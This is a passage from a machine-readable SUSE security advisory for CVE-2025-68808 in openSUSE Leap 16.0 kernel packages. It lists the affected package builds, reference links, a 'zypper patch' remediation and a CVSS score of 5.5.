"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
